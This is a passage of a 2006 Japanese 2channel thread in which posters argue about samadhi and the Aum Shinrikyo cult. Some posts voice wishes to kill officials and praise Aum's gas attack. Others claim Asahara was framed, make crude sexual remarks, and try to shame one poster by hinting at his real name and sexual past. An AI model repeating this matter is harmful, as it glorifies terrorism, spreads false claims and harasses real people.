904 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 01:59:28 ID:ZRsbW9DA
>>902
>チベット仏教が成立するより、さらに古い古代エジプトの神などを見て欲しいのである。
頭がカブトムシとかゴリラとか猫とかの半獣半人なのだ。
人間の霊も顔が人間で下半身は鳥の姿をしている。
神というより、妖怪人間のようで、これが民衆と接点が近かった
というか、街角にも川にもゴミ捨て場にもそこらへんにウジャウジャいて、
ゲゲゲの鬼太郎みたいに人間と共存してたように描かれている。
宗教が神格化、権威化される以前の古代の神は化け物の姿ながら、庶民と
密着したところもあるのだ。

却下。
エジプトの神はさらに何かの象徴。
儀式魔術発祥の地ですよ。

905 :名無しさん@3周年:2006/10/16(月) 02:01:17 ID:+uw6H5AS
>>900
では漫画スーパーマンは真実を脚色した漫画だということになる。
アメリカ人はあれが大好きだから、あなたもサマディパワーが増して
機関銃の弾を肉体で弾けるようになったら、アメリカでショーでもしたらいい。
アメリカ初の日本人大統領も夢ではない。
太陽を止めれるなら、その応用で機関銃の弾を弾けるはずだ。



906 :名無しさん@3周年:2006/10/16(月) 02:01:26 ID:ovtol+wQ
役人は大っきらいです。勝てない事をいいことにいじめてきます。
年貢をちょろまかさないかと常に監視しています。
セックスの時も常に見張っています。
役人には勝てないので、わらじの裏に役人と書いて歩いています。
役人は見るのも嫌です

907 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 02:04:59 ID:ZRsbW9DA
>>905
>は漫画スーパーマンは真実を脚色した漫画だということになる。
アメリカ人はあれが大好きだから、あなたもサマディパワーが増して
機関銃の弾を肉体で弾けるようになったら、アメリカでショーでもしたらいい。
アメリカ初の日本人大統領も夢ではない。
太陽を止めれるなら、その応用で機関銃の弾を弾けるはずだ。

だからそんな下らないことしないって。
そんなにサマディの力を否定したいなら自分がサマディに入れるようになって証明したらいい。
サマディにはそんな力無いってね。
それが一番でしょうに。

908 :名無しさん@3周年:2006/10/16(月) 02:06:01 ID:+uw6H5AS
>>903
ビルパに限らずチベットの聖人というのは、酒を飲みまくり、肉を
食いまくり、女とセックスしまくり、殺人をやり、宝石や毛皮を集め
たりと贅沢強欲の塊ながら奇跡のサマディ現象を駆使したとか伝説にある。
こんな欲だらけ人間でもサマディ現象を炸裂させれたのが真実ならば、
間違いなく卑近な凡人的欲望がある?あなたでもサマディの達人になることは
夢ではないだろう!
なにしろ肉や酒を食いまくるオッサンでもできたとあるのだ!
そして第二のミスターマリックとしてテレビで稼いでくれ!
視聴者は面白いうえに、真実のスーパーショーに飢えている。


909 :名無しさん@3周年:2006/10/16(月) 02:08:38 ID:+uw6H5AS
>>907
否定など一切してない。
それは脚色があったとしても、宗教の伝説にある通りの物理を
超えた真実か、脳内麻薬等の人類の未知の領域だと称えている。
なんであれ凄いものなのだろう。

910 :名無しさん@3周年:2006/10/16(月) 02:10:14 ID:V/yALvWI
詐欺師と似非宗教家及び似非解脱者は大嫌いです
人間のクズです、。・・。
及び、その権威に胡座かいて既得権益の上手い汁吸ってる妖怪もナー
誰のこと言ってるか、解るか?
目の鱗が取れた、、あんたら、目に鱗が嵌まってる

911 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 02:10:32 ID:ZRsbW9DA
>>908

・・・
ちょっと議論にもならないのでスルーするわ。
たぶん某オウマーさん

912 :名無しさん@3周年:2006/10/16(月) 02:15:16 ID:+uw6H5AS
前にも書いたが、人類初のロケットやクルマでも一番最初のものは
ほとんどペテンのような代物で、それを作った人間も強欲なペテン師
だったなんてものが大半だ。
ライト兄弟の飛行機でも実際には飛んではおらず、作り話だったという
説すらあるのだ!
しかしなんであれそれがスタート、きっかけとなって現代の高性能
なロケットやクルマがある。
だから麻原はこの人類初のインチキクルマくらいに考えて、あなたが
トヨタやホンダになればいいではないか。
もし麻原に良心があれば、天国か地獄でそれを願っているだろう。
何でも始まりスタートはせこいのだ。
それはヨチヨチ歩きの赤ちゃんがウンチ、おしっこ垂れ流しで情けない
のと同じだろう。


913 :名無しさん@3周年:2006/10/16(月) 02:17:01 ID:ovtol+wQ
役人は、セックスしまくり、酒を飲み、殺しまでして権力パワーを炸裂
させてきます。
もし願うなら役人を殺しまくれる力が欲しいです
修業のしかたを間違えました

914 :名無しさん@3周年:2006/10/16(月) 02:21:44 ID:V/yALvWI
あーんた揶揄ってるんすかっ?
最終解脱者標榜しロリコン三味バージン食い放題ナクソオヤジだろ

915 :名無しさん@3周年:2006/10/16(月) 02:26:51 ID:+uw6H5AS
>>914
それをオウムでは若い女の精気をセックスで吸収することで
エネルギッシュになるとか正当化してたんだろ?
実際、ヨガ体操を交えたセックスか何かで麻原も女も脳内麻薬
出まくりで素晴らしい幻覚が見えて、凄まじく気持ち良かったりして、
女も病みつきだったのかも知れないしな。
例えるならセックステクニックが凄いスーパーホストみたいなものだ。
そうでなきゃあんなに子供生まんだろう。


916 :名無しさん@3周年:2006/10/16(月) 02:27:56 ID:V/yALvWI
洗脳され不本意ながら智頭夫に粘膜こねくり回され洪水?起こし劣勢遺伝子
ぶち込まれた女子はん
文句言いたくないか???

917 :名無しさん@3周年:2006/10/16(月) 02:29:30 ID:+qz2Qcku
>>915
あべる?

918 :名無しさん@3周年:2006/10/16(月) 02:33:56 ID:ovtol+wQ
もし十年生まれるのが早ければ、麻原に弟子入りして
役人を皆殺しにできる力が欲しかったです
そのためなら、麻原のチンポを平然としゃぶり、毒ガスを
まき散らかし、弁護士の頭を割り、糞、尿を食し、苦行に耐えたと思います。
生まれるのが遅かったのが不幸でした

919 :名無しさん@3周年:2006/10/16(月) 02:35:33 ID:+uw6H5AS
麻原を否定するとは、麻原が口先で語りながら実現できなかった
美しすぎる素晴らしい理想を実現することだろう。
実際その美しすぎる理想だけなら、少なくない人がその理想に
共鳴できる内容だったのだろうしな。
ようは実現することだ。
そうすりゃ誰もが認めるし、口だけの麻原より偉いだろう。
金に汚いとか、スケベなんてのは世の中にゴロゴロしてる訳で
麻原は金に汚い人間だとか言ってる連中にしても、それを言ってる
本人も金に汚いだろうしな。


920 :名無しさん@3周年:2006/10/16(月) 02:37:44 ID:V/yALvWI
日本は水に沈む、、、
そんな大うその予言があった
麻原小宇宙ワールドの出来事ならうなずけるわ
麻原が唯一の男、廻りが大洪水、、
そりゃー日本も富士山もチンボツしますわ、、

921 :名無しさん@3周年:2006/10/16(月) 02:38:55 ID:+uw6H5AS
>>916
もしかしたらヨガの凄いセックステクニックでいきまくり、
女のほうもこの世の極楽だった可能性もあるじゃないか。
だから崇拝してたんだろうし、「あんなに喜ばせてくれた男は
麻原だけだったわよ」とか思ってるのかも知れない。
愛イコールセックスという女は少なくないからね。
だからホストクラブなんかも成立するわけだし。

922 :名無しさん@3周年:2006/10/16(月) 02:39:44 ID:0FSUQ+M1
285 :名無しさん@3周年:2006/10/16(月) 02:29:13 ID:hX16wDmd
この人物がオウム犯罪被害者の会を設立したのも
情報収集と扇動が目的だろう。

ヤマギシ、オウムともこの人物は同じような役割を担っている
と分析できる。市民派は偽装だろう。

http://money4.2ch.net/test/read.cgi/seiji/1150512809/285

923 :名無しさん@3周年:2006/10/16(月) 02:40:06 ID:+qz2Qcku
あべるか。


924 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 02:43:04 ID:ZRsbW9DA
ところで
どなたか新しいスレ立てよろしく。
あんまり詳しくないので立て方知らない^^;

925 :名無しさん@3周年:2006/10/16(月) 02:43:26 ID:V/yALvWI
普通人は自分を聖人とは言わない、そんな概念ありゃしない
テメエを聖者と名乗ったクソ垂れ親父は修行者としてグルとして失格なんだ


926 :名無しさん@3周年:2006/10/16(月) 02:45:21 ID:+uw6H5AS
創価学会の池田教祖も若いころの写真みたら、現代の新宿歌舞伎町
のホストクラブあたりにいても全然おかしくない、イケ面ホストタイプ
なんだよ。
今ではカバみたいだがね。
それで「奥様、わたくし池田と熱いセックスしませんか!一晩100万円です」
とか言われて「素敵!もうお金いくらでも出しちゃうわよ」とかいう女性もいたん
じゃないか?
現代でもホストにはまる女とか芸能人の追っかけとかそんなのばかりだろ?


927 :名無しさん@3周年:2006/10/16(月) 02:47:43 ID:+qz2Qcku
>>926
天理教は?

928 :名無しさん@3周年:2006/10/16(月) 02:54:41 ID:V/yALvWI
天理教、アンリ教シンリ教オウムシンリ教、、、、
智頭夫絶対教の前には日本新興宗教の系譜が連なる
されらを参考としてたなおっさん、、


929 :名無しさん@3周年:2006/10/16(月) 03:22:38 ID:ovtol+wQ
小学校の時、後ろの椅子に座っていた奴が、髪の毛を
引っ張って、おちょくってきました。
殴ろうとしたのだけれど、力が入らなかったので
ポケットに入っていたエンピツを握って頭に刺しました。
今ではそいつが役人だったらと思っています

930 :名無しさん@3周年:2006/10/16(月) 03:28:56 ID:wW8jbDwQ
>>872
・・がきさん、あなたも結局は自分で個人を」ちらつかせるのですね。
良く分かりました。
それと太陽が沈まないなんて幼稚なことを信じないでくださいな。
仮に事実とするとそれは地球の自転が停止していたことを意味する。
物理的に矛盾していることに気づきなさい。
尊師が聞かれたら爆笑されてしまうよ。

931 :名無しさん@3周年:2006/10/16(月) 03:30:58 ID:+uw6H5AS
私としてはシバの喜びさんに頑張って欲しいとエールを送った
つもりだったが、低俗だと嫌われたようだ。
しかしオウムの出家者でも麻原がセックスをやり、札束を握り締め、
肉やメロンをむしゃぶり食うのを見て「俺もこうなりてえ」とヨダレ
を垂らして出家した人もいるんじゃないか?
最終解脱してないなら欲望はあるんだろうしさ。
そうした欲望でしか求心力を保てなかった面もあるんじゃないか?
しかしなんであれ最初は欲望でも結果として、良い教えなんかを広める
結果になりゃそれはそれでいいだろよ。


932 :名無しさん@3周年:2006/10/16(月) 03:40:20 ID:+uw6H5AS
実はケイマなんていう女性信者ももとから淫乱ドスケベ女で、
しかも不細工フェチなので不細工な麻原に付きまとい、「ねえ
セックスしてよ!セックスしてくれたら何でもやるわよ!」とか
言ってたのかも知れないぞ!
そういう変態女は世の中いるからな。
普通に考えて麻原だけが低次元でその周囲が崇高だった可能性より、
その周囲も低次元むき出しでだからこそ集まったと考えたほうが普通だろ?
そこでさすがに麻原も嫌気がさし、それで仏教の禁欲の教えを説いたのかも
知れないじゃないか。
だいたい最初は「ヨガでセックス強化」とか言って信者勧誘してたのだよ。



933 :名無しさん@3周年:2006/10/16(月) 03:53:32 ID:ovtol+wQ
小学校の時、キャンプで山へ行きました。
友達と川辺で砂山を作って遊んでいると、上級生が小石を
砂山に当ててきました。
やめろよ、と言ってもやめないので、近ずいていきました
かかって来たら、そこら辺にある石で頭を割ろうとひらめきました。
上級生は、やめろと言ってどこかへ行きました。
今では、そいつが役人なら間違いなく頭を割ったと思います

934 :名無しさん@3周年:2006/10/16(月) 06:20:31 ID:+uw6H5AS
いくらサマディ現象が凄いことであったとしても、はたから見れば寝てる
のかと思われてもしょうがないし、漫画スーパーマンのようなことをする
ならともかく、寝てるようにしか見えない人間を凄いと言い張っても現代人の
大半を説得することはそりゃ難しいだろう。
チベットのミラレパの話でも、汚い格好でサマディ瞑想してるミラレパを見て
猟師達が怪物と勘違いして弓矢で撃ったという伝説もある。
この話はいかにそれが宗教の凄いものでも、猟師にはそれが怪物にしか見えなかった
という両者の断絶を物語るだろう。
理想を言えばスーパーマンみたいなのが最大の説得力を持つと思う。
それ見れば、誰でも宗教信じる。


935 :名無しさん@3周年:2006/10/16(月) 06:24:14 ID:+uw6H5AS
漫画スーパーマンなどは現代の「民衆信仰」であると言ってもいいと思う。
昔の人が観音様の偉大なパワーで救われることを夢見たように、現代の
観音様はさすづめスーパーマンなどの漫画ヒーローなのだろう。
ならば神様や仏様はいらっしゃるなら、ああした現代人が誰でも知ってる
宗教的象徴となって世を救ったらどうなのかね?
「誰もが知ってる」
これは重要なことだと思うよ、訳がわからないものと、誰でも知ってるもの
では天地の差がそこにある。


936 :名無しさん@3周年:2006/10/16(月) 06:56:42 ID:wW8jbDwQ
ノストラダムスの予言もサマディ及び
意識を移し変えるヨーガとは無関係とは言えないでしょう。
何らかの方法で会得していたと。
テーラワーダに絶対的な真理があるとは思えません。
・・がきさんを見れば、皆さんお分かりかと思いますがw

937 :阿佐谷北(本物) ◆Kcjlum1seI :2006/10/16(月) 07:02:19 ID:W/dZ8/P4
>>934-935
その話だと、ミラレーパはチベットでは崇拝されなかった事になるなw

貴様の世俗的な価値観で、勝手に宗教を定義するなやw

938 :名無しさん@3周年:2006/10/16(月) 07:17:50 ID:+uw6H5AS
>>937
ミラレパの伝説では空を飛び、体から虹の光線を出したミラレパ
を見てチベットの民衆はミラレパを崇拝したと言われてるぞ。


939 :名無しさん@3周年:2006/10/16(月) 07:21:35 ID:+uw6H5AS
ちなみにミラレパは最後に毒殺されて死ぬのだが、ミラレパを
毒殺したのはチベット仏教の生臭坊さんでミラレパの神通力が凄い
ので自分の権威やお布施が減ると思って毒殺したのだそうだ。
このミラレパの話にはオウムにも通じる人間の夢、願い、救済、
既得権にしがみ付く悪といった問題が全てある。

940 :名無しさん@3周年:2006/10/16(月) 07:44:53 ID:+uw6H5AS
宗教家というのは、自分の力以上の宗教家や神の話は認めたがらない
ものである。
それを認めたら自分の権威が失墜するからだ。
ようはトヨタとホンダみたいなライバル意識、ジェラシーーが働くのだろう。
だがこれでは、非常にせこい話に成り下がっていくしかない運命にある。
しかしシバの神であろうが、ビシュヌの神であろうが、ヒマラヤ仙人
だろうが、イエスキリストだろうが、凄いものは凄いと認めたらいい
じゃないかと言いたい。
上祐だって彼が本当に凄いなら、凄い部分は認めたらいい。
殺人犯でも凄い能力に関しては凄いと認めるのがグローバル実力社会だろう。
真実なら凄いし、嘘でも人々にディズニーランドのような夢を与えたのは確かだ。


941 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 08:16:50 ID:ZRsbW9DA
>>930

おはよ。
簡単に斬るね。

>・・がきさん、あなたも結局は自分で個人を」ちらつかせるのですね。良く分かりました。

その部分に反応するってことはあなたはやはり内部の方?もしくはご本人?
本名とホーリーネーム、どっちが個人情報保護法に引っかかるでしょう?
で、本名で返してくるあたりやはりオウムはルール無視の危険思想テロ団体ってことですなあ。


>それと太陽が沈まないなんて幼稚なことを信じないでくださいな。
仮に事実とするとそれは地球の自転が停止していたことを意味する。
物理的に矛盾していることに気づきなさい。
尊師が聞かれたら爆笑されてしまうよ。

逆に君に失笑するだろうね。
このビルパの話は麻原が好んで使ってたサマディの力を示すエピソードの一つだけど?
君教学が足りないねえ。

それとサマディで地球の自転を止めたって誰も言ってないよ。
例えばサマディでビルパ自身の光を見せ続けたのかもしれないじゃんw


942 :名無しさん@3周年:2006/10/16(月) 08:28:52 ID:wW8jbDwQ
>>941
・・がきさん、違いますよ。
この太陽の話は物理的な現象ではなく
サマディによる心の作用を利用したものだと言いたいのです。
だから太陽が静止しているのを感じたのは事実であります。
しかし実際に太陽を止めたわけではないのです。
そこら辺の解釈の違いでありましょう。

何はともあれとんでもない修行をあなたが実践されているのは
御可愛でなりません。
あなたは今、魔境の最中なんです。なかなか抜け出せないようですがね。
妙な解脱者と教えに引っかかり徐々にそのデータを入れ替えつつある。
あなたが三昧に入れないのも当たり前のことでしょうね。
時間と徳を無駄にしていることに気づかないのかしら?





943 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 08:42:16 ID:ZRsbW9DA
>>936
>ノストラダムスの予言もサマディ及び意識を移し変えるヨーガとは無関係とは言えないでしょう。

自分たちの正当化にまたノストラダムスの予言かい?自分勝手な解釈だったのにまだやるの?
( ´O)η ファ〜

>何らかの方法で会得していたと。

仮にノストラダムスがサマディを会得していたからといってそれがオウムの予言解釈が正しいことにはならない。

>テーラワーダに絶対的な真理があるとは思えません。・・がきさんを見れば、皆さんお分かりかと思いますがw

うあ・・・その発言いいのかな?
やっぱあなたは自分の発言が自分の首を絞めることにならないか確認してから書き込みした方がいいよ。

まずテーラワーダは数ある仏教でも最も原始仏教に近いスタイルの仏教です。
オウムが好きな南伝大蔵経もここに伝わってるね。
釈迦ムニが弟子たちに教えていた「サマタ・ヴィパッサナー瞑想」を今でも修行の中心にしています。
多くの成就者を輩出し、多くの出家者や在家者を抱えています。
その団体を否定することはお釈迦様をも否定することになりますよ?w

で、お得意のすり替え術。
俺がそこの代表みたいな言い方はよしなさい。
俺も道の途中の人間だし、そこの勉強会に出るくらいのもの。

そうまでして俺を潰したいのはやはり俺が怖いのね?w( ̄ー ̄)凸

それと言っておくよ。
完璧に絶対に「絶対的な真理」ではないのは君たち教団の方だから。
それは麻原やサマナ・成就者たちを見ていればわかるよね?みなさん

944 :名無しさん@3周年:2006/10/16(月) 08:42:20 ID:UH+hKqcd
おまいら麻原さんは痴呆か精神障害がなにかで周りと会話が全くなりたたない
ような状態である。からかうようなことするなって前にもいっただろ
仮にもみんなの憧れの存在だったんだぞ。風呂の水をコップ一杯2万円で
買ってた人もいるんだぞ。




945 :名無しさん@3周年:2006/10/16(月) 08:48:30 ID:EP+zphmK
>>944
ちゃんと喋れるんだから演技。

946 :名無しさん@3周年:2006/10/16(月) 08:49:12 ID:UH+hKqcd
65:名無しさん@3周年:2006/08/26(土) 07:16:12
麻原彰晃は日本にとって有害である

それは本当ですか?
確かに尊師は弟子の暴走によるとは言え多くの罪を犯しました。
しかし尊師をそうさせたのは社会なのではないのですか?
あの人はこの今の汚れた日本に嫌気がさしてあのような事件をおこしたのでは
ないのですか?
尊師は悪くない。悪いのはあなたがた。


947 :名無しさん@3周年:2006/10/16(月) 08:51:40 ID:wW8jbDwQ
>>そうまでして俺を潰したいのはやはり俺が怖いのね?
・・がきさん、自惚れないでくださいな。
私はあなたにこれ以上悪行積んで欲しくないだけです。
あなたに真理がないのに怖いも何も笑い話ですよ。

そもそも麻原尊師以上の存在は未だにどこにもいません。
釈迦を超えていると言っても良いでしょうね。
今だ、誰も言い表せなかった領域に到達された。
今のあなたには分からないのかも知れませんが。


948 :名無しさん@3周年:2006/10/16(月) 08:54:58 ID:wW8jbDwQ
>>946
麻原尊師が事件を起こしたとされる物理的な決定的な証拠は
実は何一つないんです。
精神世界が地球上に浸透するのを恐れる者が大掛かりな仕掛けを
施した可能性も否定はできないでしょう。

949 :名無しさん@3周年:2006/10/16(月) 09:00:06 ID:wW8jbDwQ
・・がきさんはお尻を売ったことを後悔されていない。
お金と自分の修行者の尊厳を天秤にかけお金を選ぶような
方です。
何故、快楽の伴うようなことを選ばれたのか。
物乞いにでもなっても瞑想は出来ますよ。
あなたは同性愛者であると告白しているそうですが
お尻を売ったことはどうなんでしょう?
それを告白したら誰もあなたについてこなくなるかもしれないのが
怖いのですか?

950 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:05:00 ID:ZRsbW9DA
>>942 >・・がきさん、違いますよ。

本名を晒してるって通報しましょうか?完全に晒してるとは言えないけどたぶん動いてくれますよ。どんどんオウムはしょっ引きたいハズだしw

>この太陽の話は物理的な現象ではなくサマディによる心の作用を利用したものだと言いたいのです。
だから太陽が静止しているのを感じたのは事実であります。
しかし実際に太陽を止めたわけではないのです。そこら辺の解釈の違いでありましょう。

教本にも出てた話なのを思い出したのかな?さっきとは違って随分弱気な発言だねw

>何はともあれとんでもない修行をあなたが実践されているのは御可愛でなりません。

いえいえ。あなたがたの修行こそ御可愛そう。
きちんとしたインドヒマラヤヨーガ習ったお陰であなた方の修行法の重大な欠点が見えました。
完璧だと思ってらっしゃるようですが、本物を知ってる人から見ればどんなに精巧に出来ていても偽者は偽者なのです。
証拠にあなた方の修行でサマディに入れた人がいない。アンダーグランドサマディ?中に電気ストーブ持ち込んで?それはサマディではないw

>妙な解脱者と教えに引っかかり徐々にそのデータを入れ替えつつある。

おやおや。きちんとサマディに入れる人の方が解脱者として本物でしょうにw
自分たち以外のものは認めきれないその体質があなた方を真理から遠ざけているって理解した方がいいですよ。

>あなたが三昧に入れないのも当たり前のことでしょうね。

いえいえ。サマディに自分が王手をかけてるのはなんとなく実感してますよ。
ただサマディは「入る」ものではなく「起こる」ものですからねえ。
待つしかないのですよ。
その部分も分らないからあなた方には真理はないのですよ。
ヨガスートラやヨーガ根本経典くらい読みましょうね。
サマディや、その前段階であるディアーナ(禅定。瞑想の意味)は常に起こるもの。入るものではない。ことが書かれていますよ。


951 :名無しさん@3周年:2006/10/16(月) 09:10:22 ID:AsyMDbZ0
アポロンよ。経済板から宗教板まですごい書き込みの量だな。
まさに「超人的」である。

952 :名無しさん@3周年:2006/10/16(月) 09:11:29 ID:X6IEmovl
どうしたら人を救えるのでしょう。

953 :名無しさん@3周年:2006/10/16(月) 09:14:19 ID:wW8jbDwQ
>>本名を晒してるって通報しましょうか?完全に晒してるとは言えないけどたぶん動いてくれますよ。
どんどんオウムはしょっ引きたいハズだしw

はは、まともな修行者が今度は脅しですか?呆れますね、しっかりしなさい。
サマディに入れる聖者は多いですよ。
私自身、経験者ですから。
私はサマディ中に天耳通が聞こえたりします。
あなたにとっては未知の領域でしょうがね。



954 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:18:36 ID:ZRsbW9DA
>>947 >・・がきさん、自惚れないでくださいな。

いや。恐怖と怒りを感じますよ。あなたの文章w
だから本名を晒して脅しているw

>私はあなたにこれ以上悪行積んで欲しくないだけです。あなたに真理がないのに怖いも何も笑い話ですよ。

なら脅す必要は無いはずですね^^
そんな姑息な方法を取った人物なり団体なりが正しかったことは歴史上一度も無いのですからやめた方がいいですよw
そのことだけでもあなた方に真理はないことが明らかです。真理なら脅さなくてもいい。

>そもそも麻原尊師以上の存在は未だにどこにもいません。釈迦を超えていると言っても良いでしょうね。
今だ、誰も言い表せなかった領域に到達された。今のあなたには分からないのかも知れませんが。

その根拠は?サマディ一つ示すことの出来ない者が釈迦を越えてる?寝言は寝てから言いましょう。魔境って言われますよw

>>949 >・・がきさんはお尻を売ったことを後悔されていない。お金と自分の修行者の尊厳を天秤にかけお金を選ぶような方です。

またそお話しですかあ?( ´O)η ファ〜
価値基準そこにしかないんですね。修行者の尊厳?それ、プライドっていってあなた方が一番嫌うものでは?

>何故、快楽の伴うようなことを選ばれたのか。物乞いにでもなっても瞑想は出来ますよ。

ほほう。ではあなたは物乞いになれるのですね?そんなこと言い出す方にそれが出来る人を見たことが無い。

>あなたは同性愛者であると告白しているそうですがお尻を売ったことはどうなんでしょう?
それを告白したら誰もあなたについてこなくなるかもしれないのが怖いのですか?

知ってますよ。みんな。それくらい。
あなたと違って価値基準がそこに無いので別に普通にしてくれますよ?それで?

955 :名無しさん@3周年:2006/10/16(月) 09:22:52 ID:AsyMDbZ0
>芝の喜びさん
ビルパが太陽をとめたのはいつの頃の話なの?


956 :名無しさん@3周年:2006/10/16(月) 09:27:21 ID:wW8jbDwQ
>>知ってますよ。みんな。それくらい。
あなたと違って価値基準がそこに無いので別に普通にしてくれますよ?それで?
強がりはおよしなさい。

悪行のカルマは必ず返ってきます。
本名をちらつかせるも何もなたは自分が誰であるかもう名乗っているわけです。
元シヴァナンダだと名乗った以上、現世の本名が判ってしまっても致し方ないでしょう。
全てはあなた自身の現れによる結果です。
そもそも名前に囚われている時点で解脱など到底ありえない話なんですがね・・・。


957 :名無しさん@3周年:2006/10/16(月) 09:29:18 ID:AsyMDbZ0
カルマだの何だの言ってないで、今、この時点、この瞬間から、「善人」になればいいじゃないか。


958 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:30:22 ID:ZRsbW9DA
>>953
>はは、まともな修行者が今度は脅しですか?呆れますね、しっかりしなさい。

はは、そっくりそのまま言葉を返しますよ。本名晒して脅してるのはあなたでしょうにw
そんなにシヴァナンダってハンドルネームがイヤですか?
ただのハンドルネームなのにw

>サマディに入れる聖者は多いですよ。 私自身、経験者ですから。

はーい。アウト。
「サマディに入れる」でサマディを知っていない。
「私自身、経験者」でサマディ中の認識がストップしてない。経験と言ってるから。
あなたのはサマディと思い込んでるだけ。妄想。
知ってますか?インドでヨーギーにサマディの話を聞くと
「わからん。サマディは認識が止まるから覚えていられない。だからサマディが起こった記憶はない」
って答えるのを。

>私はサマディ中に天耳通が聞こえたりします。あなたにとっては未知の領域でしょうがね。

はーい。アウト。
認識が動いてますね。サマディに非ず。
天耳通?俺にそういうもので勝負しない方がいいですよ。
そんなの普通に体験して、もう飽きた。神通の世界をサマディとは・・・その先にサマディがあるのに・・・
教本でもそれについては書いてあったはずですよ。あなたはやはり教学が足りてない。

959 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:39:50 ID:ZRsbW9DA
>>956
>強がりはおよしなさい。

ギャハハハ(≧▽≦)
自分が理解できないことはそんな反応ですかw
俺は自分の性癖を隠さないことで今の仕事を得たし、ヨガを教えるにしてもこれはかなり強い
武器ですよ。女性は安心して来れる。下心が生じないからね。
男性も多く教えていますよ。
きちんと話、きちんとこちらの伝えたいことを伝えれば自然に付いて来てくれます。
あなたにはその経験がない。つまり信頼関係などというものが無いから強がりにしか聞こえないのですよ。
即ち、あなたが強がりを言ってるのですw

>悪行のカルマは必ず返ってきます。
本名をちらつかせるも何もなたは自分が誰であるかもう名乗っているわけです。

いえいえ。あなた方がしつこいから自分で明かしたのですよ。もうそのことをお忘れですか?
で、ここでは「シヴァの喜び」か「シヴァナンダ」を名乗っている。なのに本名で話しかけるのは
無粋だし失礼なんですよ。それすら分らない?

>元シヴァナンダだと名乗った以上、現世の本名が判ってしまっても致し方ないでしょう。
全てはあなた自身の現れによる結果です。

だからってここで本名を晒していい訳ではない。それも分らない?

>そもそも名前に囚われている時点で解脱など到底ありえない話なんですがね・・・。

名前に囚われてるのはあなたでしょうに?w
囚われていなきゃシバの喜びって呼びかければいい。

960 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:40:38 ID:ZRsbW9DA
>>955

ごめん。
歴史苦手^^;

961 :名無しさん@3周年:2006/10/16(月) 09:40:59 ID:wW8jbDwQ
・・がきさん、勘違いされては困りますね。
神通がサマディの正体とは一言も言っていませんが。
まあ、何処の聖者も偽者の三昧を経験しているのでしょうね。
主体と客体の同一を理解できないあなたにサマディがなんであるか、あるいはサマディはこういうものだと
決めるのはまだ早すぎますよw。
あなたがサマディに入れないのがつくづく理解できます。
というかあなたはサマディが何だとお思っているのでしょうかね。

962 :名無しさん@3周年:2006/10/16(月) 09:45:35 ID:wW8jbDwQ
>>だからってここで本名を晒していい訳ではない。それも分らない?
しょうがない方ですなw
晒すも何もそれ自体あなたが決めることではないのですよ。
あなた自らが決めたことにより不都合が生じてもあなた自身の因ですから。


963 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:52:13 ID:ZRsbW9DA
>>961
>・・がきさん、勘違いされては困りますね。神通がサマディの正体とは一言も言っていませんが。

おやおや。ではサマディとはなんぞや?

>まあ、何処の聖者も偽者の三昧を経験しているのでしょうね。
主体と客体の同一を理解できないあなたにサマディがなんであるか、あるいはサマディはこういうものだと
決めるのはまだ早すぎますよw。


公開サマディすら出来ない人がサマディを語ってらw
しかも他の聖者を偽のサマディだってwwww
なら、あなたがサマディ示してくださいよ。33時間以上の水中サマディでねw
主体と客体の同一ね・・・というか、サマディの内容は言葉を越えるものなんですが、それを
言葉で表現している以上あなたはサマディ体験はしてないねw
主体と客体の同一なら経験してるって前にも話したけどね。でも、それは真の意味ではサマディでは
無かった。だってそれはダラーナによるサンマヤでも起こるものw

>あなたがサマディに入れないのがつくづく理解できます。
というかあなたはサマディが何だとお思っているのでしょうかね。

俺にはあなたがサマディを妄想しているのが確認できましたよ^^


964 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 09:57:17 ID:ZRsbW9DA
>>962
> しょうがない方ですなw
晒すも何もそれ自体あなたが決めることではないのですよ。
あなた自らが決めたことにより不都合が生じてもあなた自身の因ですから。

いえいえ^^
不都合を生じさせてるのはあなた方なのですよ^^
しかもこちらが何回やめなさいと訴えかけてもそれをやめない。
あなたが晒してもいいと判断していいものではないはずですよ^^
こちらの本名をそうまで書くならあなたはあなたのホーリーネームをここで書かれては?
安全な領域から石を投げつける行為は卑怯そのものですよ^^
ご自分が真理だと信じるならホーリーネームくらい示してから相手を本名で批判してみてくださいよw

965 :名無しさん@3周年:2006/10/16(月) 09:59:53 ID:wW8jbDwQ
そもそサマディは六サマディと六つに分類することができます。
私自身も修行段階の者ではありますが
全てのサマディを体験した訳ではありません。
しかしあなたよりは明らかにサマディを知っています。
したがってサマディに入れないあなたが妄想としか
捉えられないのも仕方のないことでありましょう。


966 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:04:18 ID:ZRsbW9DA
>>965
>そもそサマディは六サマディと六つに分類することができます。私自身も修行段階の者ではありますが
全てのサマディを体験した訳ではありません。しかしあなたよりは明らかにサマディを知っています。
したがってサマディに入れないあなたが妄想としか捉えられないのも仕方のないことでありましょう。

はーい。却下。
サマディでは認識が止まるのに何故それをサマディだと断言できるのですか?
サマディは常に起こるもの。これはインドでは常識ですが、あなたはどうやってサマディに「入る」のですか?


967 :名無しさん@3周年:2006/10/16(月) 10:04:51 ID:wW8jbDwQ
>>いえいえ^^
不都合を生じさせてるのはあなた方なのですよ^^
しかもこちらが何回やめなさいと訴えかけてもそれをやめない。

本当にシラを切るのが好きな方ですね、あなたという人は。
私は一度あなたの希望に従い本名を呼ぶのをやめました。
しかしあなたは872の書き込みで個人をちらつかせた。
自分で言っていることが矛盾していますが。

968 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:06:28 ID:ZRsbW9DA
ところでどなたか次のスレを。
たぶんこの人スレを消費したいだけだから。
俺、立て方しらない^^;

969 :シヴァの喜び ◆XuryVJUQ9Y :2006/10/16(月) 10:08:31 ID:ZRsbW9DA
>>967
>本当にシラを切るのが好きな方ですね、あなたという人は。
